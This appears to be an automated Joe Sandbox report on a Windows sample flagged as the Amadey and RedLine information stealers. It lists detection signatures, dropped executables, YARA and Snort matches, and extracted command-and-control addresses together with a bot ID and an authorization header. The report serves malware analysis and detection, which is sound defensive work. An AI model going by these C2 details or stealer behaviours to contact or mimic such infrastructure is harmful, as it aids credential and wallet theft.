Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:803862
MD5:f83ef0c72937a6c833bfe8d3511317e5
SHA1:5312837ca61166d8ad2998cc6d3a2b594165dec8
SHA256:ffdff2d87d032d30d6c3e794b6bc7b033d0cdf97a69ff32a563279e2844d3e13
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Disable Windows Defender real time protection (registry)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 1972 cmdline: C:\Users\user\Desktop\file.exe MD5: F83EF0C72937A6C833BFE8D3511317E5)
    • fxV11fe.exe (PID: 4652 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe MD5: AC6FB170803555E15DA3A1BA13CBC6D3)
      • faC80kI.exe (PID: 5324 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe MD5: AFC0E8E01E2B88123841047710836075)
        • atn32.exe (PID: 5020 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
        • bvr38xq.exe (PID: 1240 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe MD5: EF8079CF160510D0DA7162BC08F753D8)
  • rundll32.exe (PID: 5568 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1888 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5944 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"C2 url": "193.233.20.11:4131", "Bot Id": "dubna", "Authorization Header": "f324b1269094b7462e56bab025f032f4"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1a440:$pat14: , CommandLine:
        • 0x134a1:$v2_1: ListOfProcesses
        • 0x13280:$v4_3: base64str
        • 0x13df9:$v4_4: stringKey
        • 0x11b63:$v4_5: BytesToStringConverted
        • 0x10d76:$v4_6: FromBase64
        • 0x12098:$v4_8: procName
        • 0x12813:$v5_5: FileScanning
        • 0x11d6c:$v5_7: RecordHeaderField
        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          SourceRuleDescriptionAuthorStrings
          00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 4 entries
                    SourceRuleDescriptionAuthorStrings
                    4.0.bvr38xq.exe.d70000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      4.0.bvr38xq.exe.d70000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1a440:$pat14: , CommandLine:
                      • 0x134a1:$v2_1: ListOfProcesses
                      • 0x13280:$v4_3: base64str
                      • 0x13df9:$v4_4: stringKey
                      • 0x11b63:$v4_5: BytesToStringConverted
                      • 0x10d76:$v4_6: FromBase64
                      • 0x12098:$v4_8: procName
                      • 0x12813:$v5_5: FileScanning
                      • 0x11d6c:$v5_7: RecordHeaderField
                      • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                      2.3.faC80kI.exe.4430c20.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        2.3.faC80kI.exe.4430c20.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0x1a440:$pat14: , CommandLine:
                        • 0x134a1:$v2_1: ListOfProcesses
                        • 0x13280:$v4_3: base64str
                        • 0x13df9:$v4_4: stringKey
                        • 0x11b63:$v4_5: BytesToStringConverted
                        • 0x10d76:$v4_6: FromBase64
                        • 0x12098:$v4_8: procName
                        • 0x12813:$v5_5: FileScanning
                        • 0x11d6c:$v5_7: RecordHeaderField
                        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                        2.3.faC80kI.exe.4430c20.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          Click to see the 3 entries
                          No Sigma rule has matched
                          Timestamp:193.233.20.11192.168.2.44131496962043234 02/10/23-11:38:31.544987
                          SID:2043234
                          Source Port:4131
                          Destination Port:49696
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.4193.233.20.114969641312043231 02/10/23-11:38:44.271780
                          SID:2043231
                          Source Port:49696
                          Destination Port:4131
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.4193.233.20.114969641312043233 02/10/23-11:38:29.869058
                          SID:2043233
                          Source Port:49696
                          Destination Port:4131
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: file.exeReversingLabs: Detection: 69%
                          Source: file.exeVirustotal: Detection: 59%Perma Link
                          Source: file.exeAvira: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exeReversingLabs: Detection: 79%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exeVirustotal: Detection: 81%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exeVirustotal: Detection: 32%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeReversingLabs: Detection: 84%
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeReversingLabs: Detection: 96%
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exeJoe Sandbox ML: detected
                          Source: 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.11:4131", "Bot Id": "dubna", "Authorization Header": "f324b1269094b7462e56bab025f032f4"}
                          Source: 0.3.file.exe.515f220.0.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_008D2F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A02F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00A02F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A92F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00A92F1D
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: wextract.pdb source: file.exe, fxV11fe.exe.0.dr, faC80kI.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp, doa18JW.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: file.exe, fxV11fe.exe.0.dr, faC80kI.exe.1.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: faC80kI.exe, 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, atn32.exe, 00000003.00000000.306843047.0000000000232000.00000002.00000001.01000000.00000006.sdmp, atn32.exe.2.dr
                          Source: Binary string: .;C:\xotelogiwax.pdb source: fxV11fe.exe, 00000001.00000003.305814523.00000000050BF000.00000004.00000020.00020000.00000000.sdmp, cEB8028.exe.1.dr
                          Source: Binary string: C:\xotelogiwax.pdb source: fxV11fe.exe, 00000001.00000003.305814523.00000000050BF000.00000004.00000020.00020000.00000000.sdmp, cEB8028.exe.1.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_008D2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A02390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00A02390
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A92390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00A92390

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49696 -> 193.233.20.11:4131
                          Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49696 -> 193.233.20.11:4131
                          Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.11:4131 -> 192.168.2.4:49696
                          Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                          Source: Malware configuration extractorURLs: 193.233.20.11:4131
                          Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                          Source: Joe Sandbox ViewIP Address: 193.233.20.11 193.233.20.11
                          Source: global trafficTCP traffic: 192.168.2.4:49696 -> 193.233.20.11:4131
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: atn32.exe, 00000003.00000002.330597365.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
